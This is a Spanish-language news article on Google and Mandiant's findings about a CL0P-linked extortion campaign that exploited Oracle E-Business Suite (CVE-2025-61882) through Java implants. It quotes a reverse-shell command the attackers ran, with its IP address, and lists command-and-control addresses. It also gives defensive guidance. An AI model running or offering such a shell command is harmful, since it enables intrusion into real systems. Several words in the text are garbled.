Google denuncia que se explotaron "enormes cantidades de datos de clientes" en una campaña de extorsión

Google ha informado sobre unatraca gran escala de datos de clientes por parte de actores maliciosos, quienes, según afirma, están involucrados en un plan de extorsión. Google Threat Intelligence y Mandiant tracla operación de explotación hasta encontrar atacantes que podrían estar asociados con el grupo de extorsión CL0P.

El Grupo de Inteligencia de Amenazas de Google (GTIG) y Mandiant han descubierto una extensa campaña de extorsión que explota las vulnerabilidades de E-Business Suite (EBS) de Oracle. Esta campaña ha resultado en el robo de grandes volúmenes de datos de clientes. Según informaron, la operación comenzó el 29 de septiembre de 2025 e involucró a un grupo que afirma tener vínculos con la marca de extorsión CL0P.

Google y Mandiant revelan una explotación de día cero 

Según el informe de Google, los atacantes enviaron un "gran volumen" de correos electrónicos a ejecutivos de múltiples organizaciones, alegando violaciones de seguridad en sus entornos Oracle EBS y amenazando con publicar los datos robados a menos que se pagara un rescate. 

Los correos electrónicos, enviados desde cientos de cuentas de terceros comprometidas, incluían direcciones de contacto, [email protected] y [email protected], previamente vinculadas al sitio de filtración de datos CL0P.

La investigación conjunta de Google y Mandiant reveló que la actividad de explotación se remonta a julio de 2025, posiblemente vinculada a una vulnerabilidad de día cero, ahora traccomo CVE-2025-61882. En algunos casos, los atacantes supuestamente extrajeron una cantidad significativa de datos de las organizaciones afectadas.

Oracle declaró que las fallas explotadas se habían corregido en julio, pero el 4 de octubre publicó actualizaciones de emergencia para abordar vulnerabilidades adicionales. Oracle recomendó a sus clientes que utilizaran las últimas actualizaciones de parches críticos y enfatizó que mantenerse al día con todos los parches es esencial para evitar vulnerabilidades.

La marca de extorsión CL0P ha estado activa desde 2020 y está históricamente vinculada al grupo de ciberdelincuencia FIN11. Anteriormente, ha atacado sistemas de transferencia de archivos gestionados como MOVEit, GoAnywhere y Accellion FTA. Estas campañas siguieron un patrón similar: explotación masiva de vulnerabilidades de día cero, robo de datos confidenciales y extorsión semanas después. 

En el momento de redactar el informe, no habían aparecido nuevas víctimas de este incidentedent el sitio web de filtración de datos de CL0P. 

Implantes de Java complejos y de múltiples etapas

por Google y Mandiant revela que los atacantes utilizaron múltiples cadenas de exploits dirigidas a componentes de Oracle EBS, incluidos UiServlet y SyncServlet, para lograr la ejecución remota de código e implantar código Java en varias etapas.

En julio de 2025, se detectó actividad sospechosa relacionada con solicitudes HTTP a /OA_HTML/configurator/UiServlet. Esta actividad sospechosa se observó en otro exploit que posteriormente apareció en un grupo de Telegram llamado "SCATTERED LAPSUS$ HUNTERS" 

El exploit filtrado hizo uso de varias técnicas avanzadas para obtener control sobre los servidores seleccionados, como una falsificación de solicitud del lado del servidor (SSRF), una omisión de autenticación y una inyección de plantilla XSL.

Para agosto de 2025, los atacantes comenzaron a usar otra herramienta llamada SyncServlet para crear y ejecutar plantillas dañinas dentro de la base de datos EBS. Estas plantillas contenían cargas útiles XSL codificadas en Base64 que cargaban malware basado en Java directamente en la memoria. 

Entre los implantesdentestaban GOLDVEIN.JAVA, un descargador que recuperaba cargas útiles de segunda etapa de servidores de comando controlados por el atacante, y una cadena de múltiples capas denominada SAGE, que instalaba filtros de servlets Java persistentes para una mayor explotación.

Tras vulnerar el sistema, los atacantes usaron la cuenta EBS "applmgr" para explorarlo, recopilar información de red y del sistema, e instalar más archivos maliciosos. También usaron comandos de shell como ip addr, netstat -an y bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

Las direcciones IP 200.107.207.26 y 161.97.99.49 fuerondenten intentos de explotación, mientras que 162.55.17.215:443 y 104.194.11.200:443 fueron listadas como servidores de comando y control para la carga útil GOLDVEIN.JAVA.

GTIG no ha vinculado formalmente la operación a ningún grupo conocido, pero la campaña comparte similitudes con FIN11, un grupo de ciberdelincuencia con motivaciones financieras que anteriormente estaba asociado con el ransomware CL0P y operaciones de robo de datos a gran escala. 

Mandiant también señaló que una de las cuentas comprometidas utilizadas para enviar correos electrónicos de extorsión se había utilizado en ataques anteriores relacionados con FIN11.

Se insta a los usuarios a desconfiar de las tablas de bases de datos EBS XDO_TEMPLATES_B y XDO_LOBS, especialmente de aquellas cuyos nombres comienzan con “TMP” o “DEF”, y a bloquear el tráfico externo de Internet desde los servidores EBS para evitar una mayor extorsión de datos.

Las organizaciones también recomiendan monitorear de cerca las solicitudes HTTP a puntos finales como /OA_HTML/SyncServlet y /OA_HTML/configurator/UiServlet, y analizar los volcados de memoria para buscar evidencia de cargas útiles de Java en memoria.

Google advirtió que los grupos vinculados a CL0P casi con certeza continuarán dedicando sus recursos a adquirir exploits de día cero.